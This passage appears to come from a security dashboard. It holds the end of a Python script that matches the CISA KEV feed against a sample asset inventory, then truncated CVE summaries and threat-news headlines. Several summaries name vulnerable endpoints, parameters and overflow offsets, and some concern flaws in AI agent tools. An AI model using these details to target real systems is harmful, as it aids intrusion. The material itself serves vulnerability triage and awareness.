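     "requiredAction": "Apply updates per vendor instructions."},
    {"cveID": "CVE-2025-5777", "vendorProject": "Citrix", "product": "NetScaler ADC and Gateway",
     "dateAdded": "2026-04-12", "dueDate": "2026-04-14",
     "knownRansomwareCampaignUse": "Unknown",
     "requiredAction": "Apply mitigations per vendor instructions."},
]})

# Constructed asset inventory: hostname, vendor, product.
SAMPLE_INVENTORY = [
    {"host": "mq-01.corp.example", "vendor": "Apache", "product": "ActiveMQ"},
    {"host": "sp-web-02.corp.example", "vendor": "Microsoft", "product": "SharePoint Server"},
    {"host": "logs-01.corp.example", "vendor": "Elastic", "product": "Kibana"},
    {"host": "fw-edge-01.corp.example", "vendor": "Fortinet", "product": "FortiGate"},
]


def load_kev(text: str) -> list[dict]:
    """Parse feed JSON into its list of vulnerability records."""
    return json.loads(text)["vulnerabilities"]


def fetch_kev(url: str = KEV_FEED_URL, timeout: int = 30) -> list[dict]:
    """Download the live feed (not called by default so the example runs offline)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return load_kev(resp.read().decode("utf-8"))


def _norm(s: str) -> str:
    """Lower-case alphanumerics only, so 'SharePoint Server' and 'sharepoint' compare."""
    return "".join(ch for ch in s.lower() if ch.isalnum())


def match_inventory(kev: list[dict], inventory: list[dict]) -> list[dict]:
    """One record per (KEV entry, asset) with the same vendor and overlapping product name."""
    hits = []
    for entry in kev:
        v, p = _norm(entry["vendorProject"]), _norm(entry["product"])
        for asset in inventory:
            av, ap = _norm(asset["vendor"]), _norm(asset["product"])
            if v == av and (p in ap or ap in p):
                hits.append({**entry, "host": asset["host"]})
    return hits


def prioritize(hits: list[dict], today: date) -> list[dict]:
    """Overdue BOD 22-01 deadlines first, then known ransomware use, then earliest due date."""
    def key(h: dict):
        due = date.fromisoformat(h["dueDate"])
        ransom = h.get("knownRansomwareCampaignUse", "").lower() == "known"
        return (not due < today, not ransom, due)
    ranked = sorted(hits, key=key)
    for h in ranked:
        h["overdue"] = date.fromisoformat(h["dueDate"]) < today
    return ranked


def triage(kev_text: str = SAMPLE_KEV, inventory: list[dict] = SAMPLE_INVENTORY,
           today: date = date(2026, 4, 16)) -> list[dict]:
    """End-to-end run; 'today' defaults to the digest date."""
    return prioritize(match_inventory(load_kev(kev_text), inventory), today)


if __name__ == "__main__":
    for h in triage():
        state = "OVERDUE" if h["overdue"] else "due " + h["dueDate"]
        print(f"{h['cveID']:16} {h['host']:26} {state:16} ransomware={h['knownRansomwareCampaignUse']}")
```

Product matching here is a normalized substring test in either direction, which is deliberately loose: a KEV entry that names "SharePoint" should still hit an inventory row that says "SharePoint Server". Version ranges are not in the feed, so a hit means "go and check", not "confirmed vulnerable".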
CVE-2023-3634
20:00 KSA
HIGH CVSS 8.8 CWE-1242
In products of the MSE6 product-family by Festo a remote authenticated, low privileged attacker could use functions of undocumented test mode which could lead to a complete loss of confidentiality, integrity and availability.
CVE-2025-14868
00:16 KSA
HIGH CVSS 8.8 CWE-22
The Career Section plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Path Traversal and Arbitrary File Deletion in all versions up to, and including, 1.6. This is due to missing nonce validation and insufficient file path validation on the delete action …
CVE-2026-1620
00:16 KSA
HIGH CVSS 8.8 CWE-98
The Livemesh Addons for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 9.0. This is due to insufficient sanitization of the template name parameter in the `lae_get_template_part()` function, which uses an inadequate `str…
CVE-2026-33083
02:16 KSA
HIGH CVSS 8.8 CWE-89
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the orderDirection parameter used in dataset-related endpoints including /de2api/datasetData/enumValueDs and /de2api/datasetTree/exportDataset…
CVE-2026-33084
02:16 KSA
HIGH CVSS 8.8 CWE-89
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the sort parameter of the /de2api/datasetData/enumValueObj endpoint. The DatasetDataManage service layer directly transfers the user-supplied …
CVE-2026-33121
06:18 KSA
HIGH CVSS 8.8 CWE-89
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the API datasource saving process. The deTableName field from the Base64-encoded datasource configuration is used to construct a DDL statement…
CVE-2026-33207
06:18 KSA
HIGH CVSS 8.8 CWE-89
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the /datasource/getTableField endpoint. The getTableFiledSql method in CalciteProvider.java incorporates the tableName parameter directly into…
CVE-2026-3614
00:16 KSA
HIGH CVSS 8.8 CWE-862
The AcyMailing plugin for WordPress is vulnerable to privilege escalation in all versions from 9.11.0 up to, and including, 10.8.1 due to a missing capability check on the `wp_ajax_acymailing_router` AJAX handler. This makes it possible for authenticated attackers, with Subscribe…
CVE-2026-40502
20:00 KSA
HIGH CVSS 8.8 CWE-862
OpenHarness prior to commit dd1d235 contains a command injection vulnerability that allows remote gateway users with chat access to invoke sensitive administrative commands by exploiting insufficient distinction between local-only and remote-safe commands in the gateway handler. …
CVE-2026-40900
06:18 KSA
HIGH CVSS 8.8 CWE-89
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the /de2api/datasetData/previewSql endpoint. The user-supplied SQL is wrapped in a subquery without validation that the input is a single SELE…
CVE-2026-40901
06:18 KSA
HIGH CVSS 8.8 CWE-502
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below ship the legacy velocity-1.7.jar, which pulls in commons-collections-3.2.1.jar containing the InvokerTransformer deserialization gadget chain. Quartz 2.3.2, also bundled in the applic…
CVE-2026-6121
05:16 KSA
HIGH CVSS 8.8 CWE-119
A flaw has been found in Tenda F451 1.0.0.7. Affected by this vulnerability is the function WrlclientSet of the file /goform/WrlclientSet of the component httpd. This manipulation of the argument GO causes stack-based buffer overflow. The attack may be initiated remotely. The exp…
CVE-2026-6122
05:16 KSA
HIGH CVSS 8.8 CWE-119
A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this issue is the function frmL7ProtForm of the file /goform/L7Prot of the component httpd. Such manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The expl…
CVE-2026-6123
05:16 KSA
HIGH CVSS 8.8 CWE-119
A vulnerability was found in Tenda F451 1.0.0.7. This affects the function fromAddressNat of the file /goform/addressNat of the component httpd. Performing a manipulation of the argument entrys results in stack-based buffer overflow. Remote exploitation of the attack is possible.…
CVE-2026-6124
05:16 KSA
HIGH CVSS 8.8 CWE-119
A vulnerability was determined in Tenda F451 1.0.0.7. This vulnerability affects the function fromSafeMacFilter of the file /goform/SafeMacFilter of the component httpd. Executing a manipulation of the argument page/menufacturer can lead to stack-based buffer overflow. The attack…
CVE-2026-6133
15:16 KSA
HIGH CVSS 8.8 CWE-119
A vulnerability was identified in Tenda F451 1.0.0.7_cn_svn7958. This affects the function fromSafeUrlFilter of the file /goform/SafeUrlFilter. Such manipulation of the argument page leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicl…
CVE-2026-6134
21:18 KSA
HIGH CVSS 8.8 CWE-119
A security flaw has been discovered in Tenda F451 1.0.0.7_cn_svn7958. This vulnerability affects the function fromqossetting of the file /goform/qossetting. Performing a manipulation of the argument qos results in stack-based buffer overflow. The attack is possible to be carried …
CVE-2026-6135
21:18 KSA
HIGH CVSS 8.8 CWE-119
A weakness has been identified in Tenda F451 1.0.0.7_cn_svn7958. This issue affects the function fromSetIpBind of the file /goform/SetIpBind. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack may be performed remotely. The exploi…
CVE-2026-6136
21:18 KSA
HIGH CVSS 8.8 CWE-119
A security vulnerability has been detected in Tenda F451 1.0.0.7_cn_svn7958. Impacted is the function frmL7ImForm of the file /goform/L7Im. The manipulation of the argument page leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has …
CVE-2026-6137
21:18 KSA
HIGH CVSS 8.8 CWE-119
A vulnerability was detected in Tenda F451 1.0.0.7_cn_svn7958. The affected element is the function fromAdvSetWan of the file /goform/AdvSetWan. The manipulation of the argument wanmode/PPPOEPassword results in stack-based buffer overflow. It is possible to launch the attack remo…
CVE-2026-6348
20:00 KSA
HIGH CVSS 8.8 CWE-306
WinMatrix agent developed by Simopro Technology has a Missing Authentication vulnerability, allowing authenticated local attackers to execute arbitrary code with SYSTEM privileges on the local machine as well as on all hosts within the environment where the agent is installed.
CVE-2018-25258
05:16 KSA
HIGH CVSS 8.4 CWE-434
RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can craft malicious input in the Language for menus and messages field to trigger …
CVE-2019-25689
05:16 KSA
HIGH CVSS 8.4 CWE-787
HTML5 Video Player 1.2.5 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying an oversized key code string. Attackers can craft a malicious payload exceeding 997 bytes and paste it into the KEY CODE field in the Help Register…
CVE-2019-25691
05:16 KSA
HIGH CVSS 8.4 CWE-787
Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerability in the System Setup dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can inject a crafted payload into the Save Path for Snapshot and Re…
CVE-2019-25695
05:16 KSA
HIGH CVSS 8.4 CWE-787
R 3.4.4 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by injecting malicious input into the GUI Preferences language field. Attackers can craft a payload with a 292-byte offset and JMP ESP instruction to execute commands like calc.…
CVE-2019-25701
05:16 KSA
HIGH CVSS 8.4 CWE-787
Easy Video to iPod Converter 1.6.20 contains a local buffer overflow vulnerability in the user registration field that allows local attackers to overwrite the structured exception handler. Attackers can input a crafted payload exceeding 996 bytes in the username field to trigger …
CVE-2019-25705
09:00 KSA
HIGH CVSS 8.4 CWE-787
Echo Mirage 3.1 contains a stack buffer overflow vulnerability that allows local attackers to crash the application or execute arbitrary code by supplying an oversized string in the Rules action field. Attackers can create a malicious text file with a crafted payload exceeding bu…
CVE-2019-25697
05:16 KSA
HIGH CVSS 8.2 CWE-89
CMSsite 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cat_id parameter. Attackers can send GET requests to category.php with malicious cat_id values to extract sensitive database …
CVE-2019-25710
09:00 KSA
HIGH CVSS 8.2 CWE-89
Dolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint that allows attackers to execute arbitrary SQL queries. Attackers can inject malicious SQL code through the rowid POST parameter to extract sensitive database info…
CVE-2019-25706
09:00 KSA
HIGH CVSS 7.5 CWE-538
Across DR-810 contains an unauthenticated file disclosure vulnerability that allows remote attackers to download the rom-0 backup file containing sensitive information by sending a simple GET request. Attackers can access the rom-0 endpoint without authentication to retrieve and …
CVE-2026-3489
02:16 KSA
HIGH CVSS 7.5 CWE-89
The DirectoryPress – Business Directory And Classified Ad Listing plugin for WordPress is vulnerable to SQL Injection via the 'packages' parameter in versions up to, and including, 3.6.26 due to insufficient escaping on the user supplied parameter and lack of sufficient preparati…
CVE-2026-3599
20:00 KSA
HIGH CVSS 7.5 CWE-89
The Riaxe Product Customizer plugin for WordPress is vulnerable to SQL Injection via the 'options' parameter keys within 'product_data' of the /wp-json/InkXEProductDesignerLite/add-item-to-cart REST API endpoint in all versions up to, and including, 2.1.2. This is due to insuffic…
CVE-2026-40073
05:16 KSA
HIGH CVSS 7.5 CWE-770
SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, under certain circumstances, requests could bypass the BODY_SIZE_LIMIT on SvelteKit applications running with adapter-node. This bypass does not affect body size lim…
CVE-2026-40074
05:16 KSA
HIGH CVSS 7.5 CWE-755
SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, redirect, when called from inside the handle server hook with a location parameter containing characters that are invalid in an HTTP header, will cause an unhandled T…
CVE-2026-40246
20:43 KSA
HIGH CVSS 7.5 CWE-285
free5GC is an open-source implementation of the 5G core network. In versions 1.4.2 and below of the UDR service, the handler for deleting Traffic Influence Subscriptions checks whether the influenceId path segment equals subs-to-notify, but does not return after sending the HTTP …
CVE-2026-40247
20:43 KSA
HIGH CVSS 7.5 CWE-285
free5GC is an open-source implementation of the 5G core network. In versions 4.2.1 and below of the UDR service, the handler for reading Traffic Influence Subscriptions checks whether the influenceId path segment equals subs-to-notify, but does not return after sending the HTTP 4…
CVE-2026-5050
00:16 KSA
HIGH CVSS 7.5 CWE-347
The Payment Gateway for Redsys & WooCommerce Lite plugin for WordPress is vulnerable to Improper Verification of Cryptographic Signature in versions up to, and including, 7.0.0 due to successful_request() handlers calculating a local signature but not validating Ds_Signature from…
CVE-2026-6351
20:00 KSA
HIGH CVSS 7.5 CWE-93
MailGates/MailAudit developed by Openfind has a CRLF Injection vulnerability, allowing unauthenticated remote attackers to exploit this vulnerability to read system files.
CVE-2026-6126
05:16 KSA
HIGH CVSS 7.3 CWE-287
A weakness has been identified in zhayujie chatgpt-on-wechat CowAgent 2.0.4. The affected element is an unknown function of the component Administrative HTTP Endpoint. This manipulation causes missing authentication. It is possible to initiate the attack remotely. The exploit has…
CVE-2026-6129
09:00 KSA
HIGH CVSS 7.3 CWE-287
A vulnerability was detected in zhayujie chatgpt-on-wechat CowAgent up to 2.0.4. This affects an unknown function of the component Agent Mode Service. Performing a manipulation results in missing authentication. The attack can be initiated remotely. The exploit is now public and …
CVE-2026-6130
15:16 KSA
HIGH CVSS 7.3 CWE-77
A flaw has been found in chatboxai chatbox up to 1.20.0. This impacts the function StdioClientTransport of the file src/main/mcp/ipc-stdio-transport.ts of the component Model Context Protocol Server Management System. Executing a manipulation of the argument args/env can lead to …
CVE-2026-6142
21:18 KSA
HIGH CVSS 7.3 CWE-74
A vulnerability was identified in tushar-2223 Hotel Management System up to bb1f3b3666124b888f1e4bcf51b6fba9fbb01d15. Affected by this vulnerability is an unknown functionality of the file /admin/roomdelete.php. The manipulation of the argument ID leads to sql injection. Remote e…
CVE-2026-6148
21:18 KSA
HIGH CVSS 7.3 CWE-74
A vulnerability was detected in code-projects Vehicle Showroom Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /util/MonthTotalReportUpdateFunction.php. Performing a manipulation of the argument BRANCH_ID results in sql injection. The…
CVE-2026-6149
21:18 KSA
HIGH CVSS 7.3 CWE-74
A flaw has been found in code-projects Vehicle Showroom Management System 1.0. Affected by this issue is some unknown functionality of the file /util/BookVehicleFunction.php. Executing a manipulation of the argument BRANCH_ID can lead to sql injection. The attack may be performed…
CVE-2026-6151
23:32 KSA
HIGH CVSS 7.3 CWE-74
A vulnerability was found in code-projects Vehicle Showroom Management System 1.0. This vulnerability affects unknown code of the file /util/PaymentStatusFunction.php. The manipulation of the argument CUSTOMER_ID results in sql injection. It is possible to launch the attack remot…
CVE-2026-6152
23:32 KSA
HIGH CVSS 7.3 CWE-74
A vulnerability was determined in code-projects Vehicle Showroom Management System 1.0. This issue affects some unknown processing of the file /util/StaffAddingFunction.php. This manipulation of the argument STAFF_ID causes sql injection. The attack can be initiated remotely. The…
CVE-2026-3876
00:16 KSA
HIGH CVSS 7.2 CWE-79
The Prismatic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'prismatic_encoded' pseudo-shortcode in all versions up to, and including, 3.7.3. This is due to insufficient input sanitization and output escaping on user-supplied attributes within the 'pri…
CVE-2018-25257
05:16 KSA
HIGH CVSS 7.1 CWE-89
Adianti Framework 5.5.0 and 5.6.0 contains an SQL injection vulnerability that allows authenticated users to manipulate database queries by injecting SQL code through the name field in SystemProfileForm. Attackers can submit crafted SQL statements in the profile edit endpoint to …
CVE-2019-25693
05:16 KSA
HIGH CVSS 7.1 CWE-352
ResourceSpace 8.6 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the keywords parameter in collection_edit.php. Attackers can submit POST requests with crafted SQL payloads in the ke…
CVE-2019-25699
05:16 KSA
HIGH CVSS 7.1 CWE-89
Newsbull Haber Script 1.0.0 contains multiple SQL injection vulnerabilities in the search parameter that allow authenticated attackers to extract database information through time-based, blind, and boolean-based injection techniques. Attackers can inject malicious SQL code throug…
CVE-2019-25703
09:00 KSA
HIGH CVSS 7.1 CWE-89
ImpressCMS 1.3.11 contains a time-based blind SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'bid' parameter. Attackers can send POST requests to the admin.php endpoint with malicious 'bid' values c…
CVE-2019-25707
09:00 KSA
HIGH CVSS 7.1 CWE-89
eBrigade ERP 4.5 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to pdf.php with crafted SQL payloads in the 'id' parameter to extr…
CVE-2019-25713
09:00 KSA
HIGH CVSS 7.1 CWE-89
MyT-PM 1.5.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the Charge[group_total] parameter. Attackers can submit crafted POST requests to the /charge/admin endpoint with error-bas…
CVE-2026-35632
05:16 KSA
HIGH CVSS 7.1 CWE-61
OpenClaw through 2026.2.22 contains a symlink traversal vulnerability in agents.create and agents.update handlers that use fs.appendFile on IDENTITY.md without symlink containment checks. Attackers with workspace access can plant symlinks to append attacker-controlled content to …
CVE-2026-40500
10:55 KSA
MEDIUM CVSS 6.8 CWE-918
ProcessWire CMS version 3.0.255 and prior contain a server-side request forgery vulnerability in the admin panel's 'Add Module From URL' feature that allows authenticated administrators to supply arbitrary URLs to the module download parameter, causing the server to issue outboun…
CVE-2026-3773
02:00 KSA
MEDIUM CVSS 6.5 CWE-89
The Accessibility Suite by Ability, Inc plugin for WordPress is vulnerable to SQL Injection via the 'scan_id' parameter in all versions up to, and including, 4.20. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existi…
CVE-2026-40503
10:55 KSA
MEDIUM CVSS 6.5 CWE-22
OpenHarness prior to commit dd1d235 contains a path traversal vulnerability that allows remote gateway users with chat access to read arbitrary files by supplying path traversal sequences to the /memory show slash command. Attackers can manipulate the path input parameter to esca…
CVE-2026-6385
10:55 KSA
MEDIUM CVSS 6.5 CWE-190
A flaw was found in FFmpeg. A remote attacker could exploit this vulnerability by providing a specially crafted MPEG-PS/VOB media file containing a malicious DVD subtitle stream. This vulnerability is caused by a signed integer overflow in the DVD subtitle parser's fragment reass…
CVE-2025-13364
02:00 KSA
MEDIUM CVSS 6.4 CWE-79
The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'put_wpgm' shortcode in all versions up to, and including, 4.8.7. This is due to insufficient input sanitization and …
CVE-2026-1572
04:09 KSA
MEDIUM CVSS 6.4 CWE-79
The Livemesh Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data and Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 9.0. This is due to missing authorization checks on the AJAX handler `lae_admin_ajax…
CVE-2026-2840
04:09 KSA
MEDIUM CVSS 6.4 CWE-79
The Email Encoder – Protect Email Addresses and Phone Numbers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'eeb_mailto' shortcode in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping. This makes it pos…
CVE-2026-3299
21:39 KSA
MEDIUM CVSS 6.4 CWE-79
The WP YouTube Lyte plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lyte' shortcode in all versions up to, and including, 1.7.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for …
CVE-2026-3875
04:09 KSA
MEDIUM CVSS 6.4 CWE-79
The BetterDocs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'betterdocs_feedback_form' shortcode in all versions up to, and including, 4.3.8. This is due to insufficient input sanitization and output escaping on user supplied shortcode attributes. Thi…
CVE-2026-3878
21:39 KSA
MEDIUM CVSS 6.4 CWE-79
The WP Docs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpdocs_options[icon_size]' parameter in all versions up to, and including, 2.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, …
CVE-2026-3885
21:39 KSA
MEDIUM CVSS 6.4 CWE-79
The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_box' shortcode in all versions up to, and including, 7.4.9 due to insufficient input sanitization and output escaping on user supplied attributes.…
CVE-2026-5070
02:00 KSA
MEDIUM CVSS 6.4 CWE-79
The Vantage theme for WordPress is vulnerable to Stored Cross-Site Scripting via Gallery block text content in versions up to, and including, 1.20.32 due to insufficient output escaping in the gallery template. This makes it possible for authenticated attackers, with contributor-…
CVE-2026-20170
08:54 KSA
MEDIUM CVSS 6.1 CWE-80
A vulnerability in the Desktop Agent functionality of Cisco Webex Contact Center could have allowed an unauthenticated, remote attacker to conduct cross-site scripting attacks. Cisco has addressed this vulnerability in the Cisco Webex Contact Center service, and no customer actio…
CVE-2026-3355
04:09 KSA
MEDIUM CVSS 6.1 CWE-79
The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘crsearch’ parameter in all versions up to, and including, 5.101.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthentica…
CVE-2026-4032
02:00 KSA
MEDIUM CVSS 6.1 CWE-79
The CodeColorer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' parameter in 'cc' comment shortcode in versions up to, and including, 0.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated at…
CVE-2026-40919
08:54 KSA
MEDIUM CVSS 6.1 CWE-787
A flaw was found in GIMP. This vulnerability, a buffer overflow in the `file-seattle-filmworks` plugin, can be exploited when a user opens a specially crafted Seattle Filmworks file. A remote attacker could leverage this to cause a denial of service (DoS), leading to the plugin c…
CVE-2026-20161
06:48 KSA
MEDIUM CVSS 5.5 CWE-59
A vulnerability in the CLI of Cisco ThousandEyes Enterprise Agent could allow an authenticated, local attacker with low privileges to overwrite arbitrary files on the local system of an affected device. This vulnerability is due to improper access controls on files that are on…
CVE-2026-40915
08:54 KSA
MEDIUM CVSS 5.5 CWE-190
A flaw was found in GIMP. A remote attacker could exploit an integer overflow vulnerability in the FITS image loader by providing a specially crafted FITS file. This integer overflow leads to a zero-byte memory allocation, which is then subjected to a heap buffer overflow when pr…
CVE-2026-40918
08:54 KSA
MEDIUM CVSS 5.5 CWE-131
A flaw was found in GIMP. Processing a specially crafted PVR image file with large dimensions can lead to a denial of service (DoS). This occurs due to a stack-based buffer overflow and an out-of-bounds read in the PVR image loader, causing the application to crash. Systems that …
CVE-2026-6245
08:54 KSA
MEDIUM CVSS 5.5 CWE-805
A flaw was found in the System Security Services Daemon (SSSD). The pam_passkey_child_read_data() function within the PAM passkey responder fails to properly handle raw bytes received from a pipe. Because the data is treated as a NUL-terminated C string without explicit terminati…
CVE-2026-3369
04:09 KSA
MEDIUM CVSS 5.4 CWE-79
The Better Find and Replace – AI-Powered Suggestions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via uploaded image title in versions up to, and including, 1.7.9 due to insufficient input sanitization and output escaping. This makes it possible for authentic…
CVE-2026-6383
08:54 KSA
MEDIUM CVSS 5.4 CWE-863
A flaw was found in KubeVirt's Role-Based Access Control (RBAC) evaluation logic. The authorization mechanism improperly truncates subresource names, leading to incorrect permission evaluations. This allows authenticated users with specific custom roles to gain unauthorized acces…
CVE-2026-0718
04:09 KSA
MEDIUM CVSS 5.3 CWE-862
The Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ultp_shareCount_callback() function in all versions up to, and including, 5.0.5. This makes i…
CVE-2026-20152
06:48 KSA
MEDIUM CVSS 5.3 CWE-305
A vulnerability in the authentication service feature of Cisco AsyncOS Software for Cisco Secure Web Appliance could allow an unauthenticated, remote attacker to bypass authentication policy requirements. This vulnerability is due to improper validation of user-supplied authen…
CVE-2026-3581
02:00 KSA
MEDIUM CVSS 5.3 CWE-862
The Basic Google Maps Placemarks plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.10.7. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attack…
CVE-2026-3595
02:00 KSA
MEDIUM CVSS 5.3 CWE-862
The Riaxe Product Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.1.2. This is due to the plugin registering a REST API route at POST /wp-json/InkXEProductDesignerLite/customer/delete_customer without a permission_call…
CVE-2026-4160
04:09 KSA
MEDIUM CVSS 5.3 CWE-639
The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference via the 'submission_id' parameter in versions up to, and including, 6.1.21. This is due to missing authorization and o…
CVE-2026-40916
08:54 KSA
MEDIUM CVSS 5.0 CWE-787
A flaw was found in GIMP. A stack buffer overflow vulnerability in the TIM image loader's 4BPP decoding path allows a local user to cause a Denial of Service (DoS). By opening a specially crafted TIM image file, the application crashes due to an unconditional overflow when writin…
CVE-2026-40917
08:54 KSA
MEDIUM CVSS 5.0 CWE-125
A flaw was found in GIMP. This vulnerability, a heap buffer over-read in the `icns_slurp()` function, occurs when processing specially crafted ICNS image files. An attacker could provide a malicious ICNS file, potentially leading to application crashes or information disclosure o…
⚠️ Threat Intelligence
48 threats
rss:Recorded Future
02:48 KSA
HIGH phishing
From Bazooka to Fake Nikes
Investigation reveals business impersonation fraud schemes ranging from fake companies cashing stolen checks to AI-powered shopping scams. The analysis exposes common vulnerabilities exploited across both traditional and modern fraud t…
rss:Dark Reading
02:48 KSA
HIGH apt
North Korea Uses ClickFix to Target macOS Users' Data
North Korean APT group Sapphire Sleet is conducting social engineering attacks against macOS users through fake job offers and fraudulent Zoom updates. The ClickFix technique is used to steal credentials…
rss:BleepingComputer
02:48 KSA
CRITICAL vulnerability
New Microsoft Defender “RedSun” zero-day PoC grants SYSTEM privileges
A cybersecurity researcher has released a proof-of-concept exploit for a zero-day vulnerability in Microsoft Defender called "RedSun" that allows attackers to gain SYSTEM-level privileges. Thi…
rss:CISA Advisories
02:48 KSA
HIGH vulnerability
AVEVA Pipeline Simulation
A critical vulnerability in AVEVA Pipeline Simulation allows unauthenticated attackers to modify simulation parameters and training configurations. All versions up to 2025_SP1_build_7.1.9497.63 are affected, posing risks to industrial c…
rss:Dark Reading
01:36 KSA
HIGH malware
'Harmless' Global Adware Transforms Into an AV Killer
Dragon Boss adware distributed a malicious update in March 2025 that established persistence through scheduled tasks and configured exclusions in Windows Defender to evade detection. The previously …
rss:The Hacker News
01:36 KSA
HIGH malware
Newly Discovered PowMix Botnet Hits Czech Workers Using Randomized C2 Traffic
A new botnet called PowMix has been actively targeting the Czech workforce since December 2025, employing randomized command-and-control beaconing intervals to evade detection. This sophis…
rss:CISA Advisories
01:36 KSA
HIGH vulnerability
Delta Electronics ASDA-Soft
Arbitrary code execution vulnerability (CVSS 7.8) discovered in Delta Electronics ASDA-Soft versions up to V7.2.2.0. This affects industrial motor control software and could allow attackers to compromise automation systems. Source: h…
rss:CISA Advisories
01:36 KSA
CRITICAL vulnerability
Anviz Multiple Products
Multiple critical vulnerabilities identified in Anviz products allowing attackers to conduct reconnaissance, decrypt sensitive data, alter configurations, gain root access, and execute arbitrary code. These vulnerabilities pose significan…
rss:CISA Advisories
01:36 KSA
HIGH vulnerability
Horner Automation Cscape and XL4, XL7 PLC
Critical vulnerability discovered in Horner Automation Cscape v10.0 and XL4/XL7 PLC systems that could allow unauthorized access to industrial control systems and services. This affects operational technology environment…
rss:SecurityWeek
23:18 KSA
HIGH general
Government Can’t Win the Cyber War Without the Private Sector
National cybersecurity resilience requires accelerated public-private partnerships. Governments cannot effectively defend against cyber threats without deeper collaboration with private sector organiz…
rss:BleepingComputer
23:18 KSA
CRITICAL supply_chain
Hackers exploit Marimo flaw to deploy NKAbuse malware from Hugging Face
Hackers are exploiting a critical vulnerability in Marimo reactive Python notebook to deploy NKAbuse malware. The malware is being hosted on Hugging Face Spaces, representing a supply chain …
rss:Dark Reading
22:16 KSA
HIGH vulnerability
Microsoft's Original Windows Secure Boot Certificate Is Expiring
Microsoft's original Windows Secure Boot certificate is expiring, requiring a massive coordinated security update across the Windows ecosystem. Organizations must update their systems promptly…
rss:Dark Reading
22:16 KSA
MEDIUM general
Two-Factor Authentication Breaks Free from the Desktop
Threat actors are exploiting security gaps beyond traditional IT environments. Implementing two-factor authentication (2FA) in physical security systems can provide an additional critical defense layer again…
rss:BleepingComputer
22:16 KSA
MEDIUM phishing
Google expands Gemini AI use to fight malicious ads on its platform
Google is expanding its use of Gemini AI models to detect and block malicious advertisements on its platforms as cybercriminals evolve their evasion tactics. This AI-driven approach aims to prot…
rss:SecurityWeek
21:00 KSA
LOW general
OpenAI Widens Access to Cybersecurity Model After Anthropic’s Mythos Reveal
OpenAI has expanded access to GPT-5.4-Cyber, a specialized AI model fine-tuned for cybersecurity defenders. This move lowers barriers for legitimate cybersecurity professionals to levera…
rss:The Hacker News
21:00 KSA
CRITICAL vulnerability
ThreatsDay Bulletin: Defender 0-Day, SonicWall Brute-Force, 17-Year-Old Excel RCE and 15 More Stories
Multiple critical security incidents reported including a zero-day vulnerability in Microsoft Defender, brute-force attacks targeting SonicWall devices, and a 1…
rss:BleepingComputer
21:00 KSA
MEDIUM general
Most "AI SOCs" Are Just Faster Triage. That's Not Enough.
Most AI-powered Security Operations Center (SOC) tools only accelerate alert triage rather than reducing actual workload or improving security outcomes. True effectiveness requires end-to-e…
rss:BleepingComputer
21:00 KSA
LOW general
Most "AI SOCs" Are Just Faster Triage. That's Not Enough.
